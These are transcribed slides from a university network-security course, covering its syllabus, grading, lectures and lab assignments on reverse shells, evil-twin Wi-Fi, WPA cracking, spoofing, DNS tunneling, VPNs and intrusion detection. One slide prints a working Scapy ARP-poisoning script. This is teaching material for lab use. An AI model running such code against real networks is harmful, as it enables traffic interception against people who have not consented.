ties327 network security (3-5 ects) autumn 2016users.jyu.fi/~timoh/ties327/start2016.pdf · ties327...
TRANSCRIPT
![Page 1: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/1.jpg)
UNIVERSITY OF JYVÄSKYLÄ
TIES327 – Network Security (3-5 ECTS)
Autumn 2016
Prof. Timo Hämäläinen [email protected]
Department of Mathematical Information Technology
IT Faculty
University of Jyväskylä
![Page 2: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/2.jpg)
UNIVERSITY OF JYVÄSKYLÄ
Important note!
If you have completed the "old course" TIES326 in year
2012 or 2013, you will not get credits from this
TIES327, as its' content has about 30% similar
assignments as TIES326 has in 2012 and 2013.
Those students who has completed TIES326 before
2012, has possibility to get credits from TIES327.
![Page 3: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/3.jpg)
UNIVERSITY OF JYVÄSKYLÄ
Goals of the course
Students understand what the term "security" keep
inside in particular in the networks and services point of view
... get familiar with the different security aspects and to
understand the necessary terms
…are cabable to apply the various tools in auditing and protecting
against network attacks
... learn to look for a new knowledge about this area
The feeling of safety can not to be ignorance !
The course focuses on hands-on making of the security issues
and learning different networking security exercises by self-doing
Remember: Use of the presented methods are illegal in the public
networks ! They’ll put you in a jail cell...
![Page 4: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/4.jpg)
UNIVERSITY OF JYVÄSKYLÄ
Prerequisites
Basic knowledge about networks, TCP/IP- protocols
and programming
For example courses (or similar knowledge)
ITKP101- Tietokone ja tietoverkot työvälineenä
ITKP104 – Tietoverkot
ITKP102 - Ohjelmointi 1
![Page 5: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/5.jpg)
UNIVERSITY OF JYVÄSKYLÄ
How to complete course ?
Complete assignments
Group of 1-3 students
You should get at least 50% of total points and at least the same 50% of the each
assignments. Answer in depth to the all questions presented in the assignments in
order to get the course completed.
We really encourage you to install and complete these exercises with your own
devices. If it is not possible, send email to me and ask time to the our lab and
complete those there. If you're coming to the lab, read assignment carefully and
answer to the preliminary questions before coming.
The course can be completed 3-5 ECTS wide
3 ECTS fulfilment: complete assignments 1-3
4 ECTS fulfilment: complete assignments 1-4
5 ECTS fulfilment complete all 5 assignments
![Page 6: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/6.jpg)
UNIVERSITY OF JYVÄSKYLÄ
1. Virtual Network Configuration and Introduction
into Kali Linux
• In this first assignment, you will create and configure virtual network which will be
used for testing different kinds of network attacks.
• To do this you need an PC with at least 8 GB of RAM (bigger is of course better!).
• We are using Ubuntu 16.04 in host machine, but it is of course possible to make
the same virtual network configuration, if you have Windows or Mac OS by using
corresponding commands.
• https://www.virtualbox.org/
About the assignments
![Page 7: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/7.jpg)
UNIVERSITY OF JYVÄSKYLÄ
1.1 Virtual Network Configuration
![Page 8: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/8.jpg)
UNIVERSITY OF JYVÄSKYLÄ
1.2 Pentesting with Kali http://www.kali.org/
From the creators of BackTrack comes Kali Linux, the most advanced and
versatile penetration testing distribution ever created. BackTrack has grown far
beyond its humble roots as a live CD and has now become a full-fledged
operating system
https://www.kali.org/penetration-testing-with-kali-linux/
In this assignment you are going to get familiar with some tools available at Kali.
It is intended to build your basic skills and get you familiar with the Kali properties
like:
• Port scanning
• Finding security exploits
• SQL injection
• Password brute-forcing
• Denial-of-Service attack
• etc.
Kali tools: http://tools.kali.org/tools-listing
![Page 9: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/9.jpg)
UNIVERSITY OF JYVÄSKYLÄ
2. Attacks from the Outside and Wi-Fi Security
Cracking
2.1 Reverse TCP attacks
In this tutorial, we get familiar with one dangerous attack as reverse TCP
connection. A firewall usually blocks open ports, but does not block outgoing
traffic, therefore a reverse connection is used to bypass firewall and router
security restrictions.
For example, a Trojan horse running on a computer behind a firewall that blocks
incoming connections can easily open an outbound connection to a remote host
on the Internet. Once the connection is established, the remote host can send
commands to the Trojan horse. Trojan horses that use a reverse connection
usually send SYN (TCP) packets to the attacker's IP address. The attacker listens
for these SYN packets and accepts the desired connections.
It will be shown how to establish reverse TCP connection between a client and the
external attacker with Kali Linux 2016.2 installed on it.
![Page 10: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/10.jpg)
UNIVERSITY OF JYVÄSKYLÄ
2.2 Wi-Fi "evil twin" attack
In this tutorial, the attacker is supposed to have two network interfaces. For
example, you can have two wireless interfaces or one wireless and one wire
interface. We also assume that you install Kali Linux 2016.2 on the attacker
machine. Your Wi-Fi router must support WPA encryption. Interface "eth0“ is used
to connect the attacker to the Internet, whereas "wlan0" will be used to create "evil
twin" access point.
It is worth to notice that this tutorial and next one should be done by using real
devices not the virtual network you configured earlier.
The attack presented in this tutorial is not classical "evil twin" attack, in which the
client automatically connects to the "evil" access point after being forced to
disconnect from the legitimate one.
In our case, the attack is more a phishing attempt combined with some simple
DDoS attack against the legitimate access point. This attack might take place in
public places, such as big hotels or airports, where several access points have the
same name, and when a client cannot connect to a legitimate access point, he
might try to connect to the "evil" one without paying attention to the fact that it is
unencrypted. In this tutorial, the attack is performed by using such applications as
Aircrack, Mdk3 and Iptables.
![Page 11: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/11.jpg)
UNIVERSITY OF JYVÄSKYLÄ
2.3 WPA encryption cracking by dictionary attack
This tutorial explains how to crack wireless networks encrypted with WPA by using
dictionary attacks. For this tutorial, you are supposed to have two laptops with
wireless interfaces (or one laptop and one smartphone) and wireless access point,
e.g. WiFi router. One of the laptops will be used as a client and another one as an
attacker. In this tutorial, we assume that you install Kali Linux on the attacker
machine. WiFi router must support WPA encryption.
Despite the fact, that pure brute force is not effective for the cracking of the WPA
encryption mode, attackers are able to crack it with the help of different dictionary
attacks. In this tutorial, this type of the attack is demonstrated by using different
Kali applications: Aircrack, Cowpatty, John The Ripper and Hashcat.
![Page 12: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/12.jpg)
UNIVERSITY OF JYVÄSKYLÄ
3. Attacks from the Inside and Man-In-The-Middle
Attacks
3.1 ARP poisoning, DNS and DHCP spoofing
ARP poisoning is also known as ARP Spoofing, ARP Flooding and ARP Poisoning
Routing. So what basically is ARP poisoning ?
It is technique which allows an attacker sniffs traffic from LAN, monitors it and even
stop it. ARP poisoning is done by sending fake or spoofed messages to an Ethernet
LAN card. By doing so an attacker manages to associate its MAC address with IP
address of another node on network
(which is basically default gateway’s IP). Then the traffic meant for gateway first goes
to attacker and then to gateway thus allowing attacker to sniff traffic from network.
![Page 13: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/13.jpg)
UNIVERSITY OF JYVÄSKYLÄ
3.1 DNS and DHCP spoofing
• The Domain Name System translates names that human can understand to IP addresses.
First, the client sends DNS query and the DNS server responds with DNS response. The DNS
query and response have identical ID number and query. Then the client updates its DNS
cache entries accordingly domain name and IP address. Assume that the attacker wants to
change the clients DNS cache so that traffic from client to the domain web.seclab,jyu.fi. will be
redirected to the attackers server 192.168.1.102.
• For this purpose the attacker sniffs DNS queries from the client and waits for DNS query with
the relevant query, then the attacker spoofs a DNS response e.g. with the attacker's IP. Client
updates its DNS cache and therefore all traffic goes to the attacker. Attacker repeats to spoof
DNS responses to maintain a valid cache. However DNS query eventually arrives the DNS
server and the server will respond with a legitimate DNS response. When the client gets the
legitimate response, it will update its cache. For this reason, ARP poisoning of the client
should be done before DNS spoofing. In this section, we show how to spoof the DNS server.
• The DHCP (Dynamic Host Configuration Protocol) is used to configure network settings to
hosts on IP networks. DHCP allows hosts to be dynamically configured with IP address,
subnet mask, gateway address and DNS server address. It works as follows: first, the client
sends (broadcasts) DHCP discover containing transaction ID. The DHCP server responds
with DHCP offer which contains the same transaction ID. The client then sends DHCP request
and the DHCP server responds with DHCP Ack. When the attacker applying DHCP spoofing
attack an attacker waits for DHCP discover request from the client. After getting this request
the attacker spoofs a DHCP offer with assigning malicious gateway or/and DNS server. After
that the client responds with DHCP request and the attacker spoofs a DHCP Ack as well.
Finally, the client updates its DNS server and gateway addresses. However, when DHCP
discover arrives the DHCP server this server responds to the client with a legitimate DHCP
offer. If the client gets the legitimate offer first then DHCP spoofing will not work. For this
reason, the attacker DoS the DHCP server during the attack so as DHCP server can not
respond to clients.
![Page 14: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/14.jpg)
UNIVERSITY OF JYVÄSKYLÄ
3.2 HTTP content modification and attack against the bank user
Once an attacker has been located in the middle between his victim and
other network nodes, he can easily change HTTP requests and
responses which go through him. In this section, the attacker changes
web pages which the victim requested from a web site to make the victim
feel nervous. For this attack, the attacker first spoofs ARP cache of the
victim in order to be "in the middle". Then, when the victim requests a
web page, he modifies content (pictures etc.) contained on the page and
sends the result to the victim.
![Page 15: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/15.jpg)
UNIVERSITY OF JYVÄSKYLÄ
3.3 DNS tunneling attack
With DNS tunneling, another protocol can be tunneled through DNS. For
tunneling to work, a client-server model is used. The client is typically
behind the organization's security controls and the server is located
somewhere on the Internet. The DNS communications between the client
and server occur over the organization's own DNS infrastructure and any
other public DNS servers. Since this is a client-server model, any type of
traffic can be sent over the tunnel. Some tunnel applications even
provide encryption.
In this tutorial, we consider the following scenario. The malicious actor
manages to compromise a host in our LAN network by social engineering
and install the DNS tunnel client software. DNS tunnel client is
configured to use the LAN internal DNS server (192.168.1.2). The
internal DNS server forwards non-cached requests an upstream/public
DNS server (192.168.1.1). Our external attacker installs and configures
DNS tunnel server on his machine. We next assume, that the external
attacker has a registered domain name, and, therefore, all the DNS
requests are forwarded to the DNS tunnel server. The malicious actor is
then able to send data back and forth between the client and server.
![Page 16: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/16.jpg)
UNIVERSITY OF JYVÄSKYLÄ
4. Public-Key Cryptography
4.1 Configuring VPN connection with the help of OpenVPN
This tutorial explains how to configure simple OpenVPN server and client, set
up your own Certificate Authority (CA), generate keys and sign certificates.
In addition, it shortly describes dual-factor authentication based on
username and password, which are used by the server for authenticating a
connecting client.
OpenVPN is a full-featured SSL VPN which implements secure network
extension using the industry standard SSL/TLS protocol, supports exible
client authentication methods based on certicates, smart cards, and/or
username/password credentials, and allows user or group-specic access
control policies using firewall rules applied to the VPN virtual interface.
![Page 17: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/17.jpg)
UNIVERSITY OF JYVÄSKYLÄ
4.2 Public-key cryptography with GPG
This tutorial explains how to configure Public Key Infrastructure (PKI), encrypt files and sign emails by
using GNU Privacy Guard (GPG).
• Public-key cryptography allows you to communicate with someone securely without exchanging a
secret password first. With public-key encryption, instead of sharing a password, each party
generates a "keypair“ consisting of a "public" key and a "secret/private" key.
• Each party can then publish their "public" key to the world or send it directly to the other party,
while keeping their secret key private and safe. If you have Person's public key, you can do a few
things with it:
• Encrypt a message that only that Person can decrypt (they need their secret key to decrypt
it).
• Validate that Person signed a message with their secret key. This also lets you verify
strongly that the message was not corrupted nor modified in transmission.
• With your secret key, you can do following things:
• Decrypt messages encrypted with your public key.
• Sign messages that others can verify came from you (they need your public key to verify the
signature).
• This assignment explains how to configure and use Public Key Infrastructure (PKI), encrypt les
and sign emails by using GNU Privacy Guard (GPG).
• The GNU privacy guard is the GNU project's complete and free implementation of the OpenPGP
standard as defined by RFC4880. GPG allows to encrypt and sign your data and communication,
features a versatile key management system as well as access modules for all kinds of public key
directories
![Page 18: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/18.jpg)
UNIVERSITY OF JYVÄSKYLÄ
5. Signature-Based and Anomaly-Based Intrusion
Detection
5.1 Signature-based intrusion detection
Nowadays, due to the exponentially growing number of network attacks
intrusion detection has become an important area of research. In this
tutorial, we get familiar with the signature-based approach of intrusion
detection. First, we analyze a small pcap- file which contains network traffic
sent to a web service during two hours. Most of the traffic stored in this le is
legitimate, but there is also intrusive traffic that we try to find by applying a
signature-based detection approach that relies on the analysis of payload of
network packets. After that, we get familiar with Snort, that is a free and
open source network intrusion detection and prevention system.
![Page 19: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/19.jpg)
UNIVERSITY OF JYVÄSKYLÄ
5.1 Payload-based and header-based intrusion detection
The recent rise in the amount of traffic and the increase in line speed put a
heavy computational load and resource consumption on such traditional
payload-based IDSs. Compared to payload-based intrusion detection, the
analysis of information in packet headers handles a considerably lower
amount of data. However, since header measurements provide only an
aggregated view of the data transferred over the network, they cannot reach
the accuracy of the payload-based approach. Thus, a header-based IDS is
not supposed to substitute completely a payload-based system, but can be
used along with it to allow early detection in environments in which payload-
based inspection is not scalable.
In this section, we analyze information contained in packet header and
apply an anomaly-based detection approach. Such approach searches for a
sample that deviates significantly from the expected behavior and classifies
such sample as an anomaly. In this tutorial, we calculate a sample entropy
of different parameters extracted from packet headers to find network
anomalies.
![Page 20: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/20.jpg)
UNIVERSITY OF JYVÄSKYLÄ
Tools used in assignments
Kali Linux: http://www.kail.org/
https://www.kali.org/penetration-testing-with-kali-linux/
Scapy: http://secdev.org/projects/scapy/
Wireshark: http://www.wireshark.org/
pfSense: http://www.pfsense.org/
OpenVPN: https://openvpn.net/
GNU Privacy Guard (GPG): https://www.gnupg.org/
Snort: http://www.snort.org/
![Page 21: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/21.jpg)
UNIVERSITY OF JYVÄSKYLÄ
An example: ARPpoisoning.py from scapy.all import *
from time import sleep
import threading
import os, sys
class SpoofThread (threading.Thread):
def __init__(self, victim, gateway):
self.packet = ARP()
self.packet.psrc = gateway
self.packet.pdst = victim
threading.Thread.__init__(self)
def run (self):
counter = 0
print "spoofing " + str(self.packet.pdst) + " every 5 seconds..."
try:
while 1:
send(self.packet, verbose=0);
counter += 1
print 'poison #' + str(counter)
sleep(5);
except Exception as e:
print type(e)
print e.args
print e
pass
if __name__ == '__main__':
if len(sys.argv) != 3:
sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP> \n example: python ArpSpoofing.py 192.168.72.128
192.168.72.2' % os.path.basename(__file__))
targets_dest_ips = [sys.argv[1]]
spoofed_src_ip = [sys.argv[2]]
for ip in targets_dest_ips:
SpoofThread(ip, spoofed_src_ip).start()
![Page 22: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/22.jpg)
UNIVERSITY OF JYVÄSKYLÄ
Course grading
3ECTS Total points (max. 45p.) 4ECTS Total points (max. 60p.) 5ECTS Total points (max. 70p.) GRADE
43 58 67 5
38 51 61 4
33 44 54 3
28 37 45 2
23 30 35 1
Work load:
Ca. 100-120 hours, consisting of some lectures, main
task to complete assignments xx hours (of course
depending on your background skills).
![Page 23: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/23.jpg)
UNIVERSITY OF JYVÄSKYLÄ
About the lectures
The lectures are intended to provide introduction to the different
networking security topics and examples
The course focuses on hands-on making of the security issues and
learning by doing (not learning by listening !!).
Some literature:
• Lot of research papers
• - IEEE Explore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp
- ACM, http://portal.acm.org/dl.cfm
- Google scholar, http://scholar.google.com/
– http://site.ebrary.com/lib/jyvaskyla
• Introduction to Network Security
• Hacking Exposed Web 2.0 : Web 2.0 Security Secrets and
Solutions
• CEH : Certified Ethical Hacker Study Guide
![Page 24: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/24.jpg)
UNIVERSITY OF JYVÄSKYLÄ
L1: Introduction to the network security
What is security and what are the goals
Threats of networks and IT- systems
Security policies
Risk calculation
Security offenses
Social Engineering
Phishing
Legislation
![Page 25: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/25.jpg)
UNIVERSITY OF JYVÄSKYLÄ
L2: Protecting your networked services (visiting lecture
by Tapio Väärämäki, Exclusive Networks Finland)
CARM – Cyber Attack Remediation and Mitigation
UTM (Unified Threat Management)
NGFW (Next Generation Firewall)
WAF (Web Application Firewall)
Database Security
File Security
Endpoint Security
![Page 26: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/26.jpg)
UNIVERSITY OF JYVÄSKYLÄ
L3: Auditing networking security (visiting lecture by
Matti Kannela)
Information security as a concept
Technical security vs. processes / controls / humans.
Examples and cases ’from the field’.
How to create solid IS fundamentals and standards?
Why bad things happen and how to prevent them?
Change management explained
![Page 27: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/27.jpg)
UNIVERSITY OF JYVÄSKYLÄ
L4: Monitoring and analysing the nework data
Normal netwok behaviour
Anomality detection
How to gather data
Pre-processing and analysing the data
![Page 28: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/28.jpg)
UNIVERSITY OF JYVÄSKYLÄ
L5: Security Issues for 4/5G Cellular Networks, IoT
Cellural networks security issues (PHY/MAC layers)
Different security threats
User Identity
Femtocells
Interoperability
RRC signalling
Other threats
Being an all-IP networks makes the system vulnerable
against IP attacks, such DoS over the public IP addresses of the core
network interfaces, traffic
eavesdropping and injection attacks.
IoT security issues
![Page 29: TIES327 Network Security (3-5 ECTS) Autumn 2016users.jyu.fi/~timoh/TIES327/start2016.pdf · TIES327 – Network Security (3-5 ECTS) Autumn 2016 ... into Kali Linux • In this first](https://reader031.vdocuments.us/reader031/viewer/2022030504/5ab15c0e7f8b9aea528c51a9/html5/thumbnails/29.jpg)
UNIVERSITY OF JYVÄSKYLÄ
Some links
https://www.viestintavirasto.fi/kyberturvallisuus.html
http://www.iltasanomat.fi/digitoday/tietoturva/
Vulnerabilities
http://www.securityfocus.com
Advanced Persistent Threat
https://www.secureworks.com/capabilities/threat-
intelligence/advanced-threats